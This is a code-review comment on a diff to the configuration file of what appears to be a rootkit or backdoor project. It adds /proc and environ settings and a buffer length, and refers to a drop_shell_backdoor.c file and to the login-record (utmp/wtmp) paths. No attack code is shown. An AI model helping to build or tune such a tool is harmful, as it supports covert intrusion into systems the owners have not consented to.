beurk.conf

```diff
@@ -62,3 +62,12 @@ _ENV_XTERM =        TERM=xterm
 _UTMP_FILE = /var/run/utmp
 # str: wtmp file
 _WTMP_FILE = /var/log/wtmp
+
+# str: path to processes
+PROC_PATH = /proc/
+
+# str: format string for proc/env
+ENV_LINE = %s/environ
+
+# int: maximal length of our strings
+MAX_LEN = 4125
```

Comment:
aazel uses this value, but before using it as a generic macro on the whole program, i d like to know exactly why this specific value.
i needed it too on drop_shell_backdoor.c, so for the moment i use a local `SLOOP_BUF_SIZE` on line 94 of the file.

we need to discuss about it